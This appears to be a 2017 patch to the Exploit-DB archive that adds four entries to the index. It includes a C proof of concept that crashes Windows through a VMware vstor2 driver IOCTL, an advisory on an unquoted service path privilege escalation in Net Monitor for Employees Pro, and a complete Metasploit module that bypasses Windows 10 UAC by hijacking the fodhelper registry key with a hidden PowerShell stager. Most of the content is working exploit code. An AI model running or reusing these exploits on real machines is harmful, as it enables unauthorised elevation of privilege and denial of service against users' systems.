From bed1811f1d32f85e08f6d5b1be23bc25a555de19 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 9 Jun 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-06-09 4 new exploits Linux Kernel - 'ping' Local Denial of Service VMware Workstation 12 Pro - Denial of Service Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit) --- files.csv | 5 +- platforms/{linux => android}/dos/42135.c | 0 platforms/windows/dos/42140.c | 42 +++++ platforms/windows/local/42141.txt | 37 ++++ platforms/windows/local/42142.rb | 209 +++++++++++++++++++++++ 5 files changed, 292 insertions(+), 1 deletion(-) rename platforms/{linux => android}/dos/42135.c (100%) create mode 100755 platforms/windows/dos/42140.c create mode 100755 platforms/windows/local/42141.txt create mode 100755 platforms/windows/local/42142.rb diff --git a/files.csv b/files.csv index ce607eb3c..54bceb69a 100644 --- a/files.csv +++ b/files.csv @@ -5530,11 +5530,12 @@ id,file,description,date,author,platform,type,port 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 -42135,platforms/linux/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",linux,dos,0 +42135,platforms/android/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",android,dos,0 42136,platforms/linux/dos/42136.c,"Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service",2017-06-07,"Marcus Meissner",linux,dos,0 42137,platforms/linux/dos/42137.txt,"PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption",2017-06-07,"Tim Kosse",linux,dos,22 42138,platforms/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",linux,dos,0 42139,platforms/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",linux,dos,0 +42140,platforms/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9036,6 +9037,8 @@ id,file,description,date,author,platform,type,port 42116,platforms/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",windows,local,0 42119,platforms/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,windows,local,0 42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0 +42141,platforms/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",windows,local,0 +42142,platforms/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 diff --git a/platforms/linux/dos/42135.c b/platforms/android/dos/42135.c similarity index 100% rename from platforms/linux/dos/42135.c rename to platforms/android/dos/42135.c diff --git a/platforms/windows/dos/42140.c b/platforms/windows/dos/42140.c new file mode 100755 index 000000000..3cc9d25e0 --- /dev/null +++ b/platforms/windows/dos/42140.c @@ -0,0 +1,42 @@ +/* + * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player) + * CVE: 2017-4916 (VMSA-2017-0009) + * Author: Borja Merino (@BorjaMerino) + * Date: May 18, 2017 + * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757) + * Affected: VMware Workstation Pro/Player 12.x + * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device + * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check) +*/ + +#include "windows.h" +#include "stdio.h" + +void ioctl_crash() +{ + HANDLE hfile; + WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared"; + DWORD dummy; + char reply[0x3FDC]; + hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); + char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab"; + DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL); +} + +void run_vix() +{ + STARTUPINFO si; + PROCESS_INFORMATION pi; + RtlZeroMemory(&si, sizeof(si)); + RtlZeroMemory(&pi, sizeof(pi)); + si.dwFlags |= STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + DWORD createFlags = CREATE_SUSPENDED; + CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); +} + +void main() +{ + run_vix(); //Comment this if vixDiskMountServer.exe is already running + ioctl_crash(); +} \ No newline at end of file diff --git a/platforms/windows/local/42141.txt b/platforms/windows/local/42141.txt new file mode 100755 index 000000000..77f3300ec --- /dev/null +++ b/platforms/windows/local/42141.txt @@ -0,0 +1,37 @@ +# Exploit Title: Unquoted Service Path Privilege Escalation - Net Monitor for Employees Pro <= 5.3.4 +# Date: 18/03/2017 +# Exploit Author: Saeid Atabaki +# E-Mail: bytecod3r gmail.com, saeid Nsecurity.org +# Linkedin: https://www.linkedin.com/in/saeidatabaki +# Vendor Homepage: http://networklookout.com/ +# Version: <= 5.3.4 +# CVE: CVE-2017-7180 +# Vendor Not Resoponding. contacted vendor 18/3/2017 + +Net Monitor for Employees is an application to monitor users machine and its agent based. Its agent install itself as a service ("Net Monitor for Employees Agent") with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. + + +C:\Users\Win7>sc qc "Net Monitor for Employees Agent" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Net Monitor for Employees Agent + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Net Monitor for Employees Pro\bin\nmep_ctrlagentsvc.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Net Monitor for Employees Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +A successful attempt would require the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. + + +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) BYTECOD3R diff --git a/platforms/windows/local/42142.rb b/platforms/windows/local/42142.rb new file mode 100755 index 000000000..80031800d --- /dev/null +++ b/platforms/windows/local/42142.rb @@ -0,0 +1,209 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::Powershell + include Post::Windows::Priv + include Post::Windows::Registry + include Post::Windows::Runas + + FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze + FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze + EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze + EXEC_REG_VAL = ''.freeze # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze + FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze + CMD_MAX_LEN = 16383 + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', + 'Description' => %q{ + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. + + This module modifies a registry key, but cleans up the key once the payload has + been invoked. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'winscriptingblog', # UAC bypass discovery and research + 'amaloteaux', # MSF module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', + 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' + ] + ], + 'DisclosureDate' => 'May 12 2017' + ) + ) + end + + def check + if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + commspec = '%COMSPEC%' + registry_view = REGISTRY_VIEW_NATIVE + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] == ARCH_X64 + if session.arch == ARCH_X86 + # fodhelper.exe is x64 only exe + commspec = '%WINDIR%\\Sysnative\\cmd.exe' + if target_arch.first == ARCH_X64 + # We can't use absolute path here as + # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session + psh_path = "powershell.exe" + end + end + if target_arch.first == ARCH_X86 + # Invoking x86, so switch to SysWOW64 + psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" + end + else + # if we're on x86, we can't handle x64 payloads + if target_arch.first == ARCH_X64 + fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') + end + end + + if !payload.arch.empty? && (payload.arch.first != target_arch.first) + fail_with(Failure::BadConfig, 'payload and target should use the same architecture') + end + + # Validate that we can actually do things before we bother + # doing any more work + check_permissions! + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + payload_value = rand_text_alpha(8) + psh_path = expand_path(psh_path) + + template_path = Rex::Powershell::Templates::TEMPLATE_DIR + psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) + + if psh_payload.length > CMD_MAX_LEN + fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") + end + + psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" + cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" + + existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" + exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? + + if existing.empty? + registry_createkey(FODHELPER_WRITE_KEY, registry_view) + end + + print_status("Configuring payload and stager registry keys ...") + unless exist_delegate + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) + end + + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) + + # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. + cmd_path = expand_path(commspec) + cmd_args = expand_path("/c #{FODHELPER_PATH}") + print_status("Executing payload: #{cmd_path} #{cmd_args}") + + # We can't use cmd_exec here because it blocks, waiting for a result. + client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true }) + + # Wait a copule of seconds to give the payload a chance to fire before cleaning up + # TODO: fix this up to use something smarter than a timeout? + Rex::sleep(5) + + handler(client) + + print_status("Cleaining up registry keys ...") + unless exist_delegate + registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) + end + if existing.empty? + registry_deletekey(FODHELPER_DEL_KEY, registry_view) + else + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) + end + registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view) + end + + def check_permissions! + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + + # Check if you are an admin + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + + unless is_in_admin_group? + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + + print_status('UAC is Enabled, checking level...') + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end \ No newline at end of file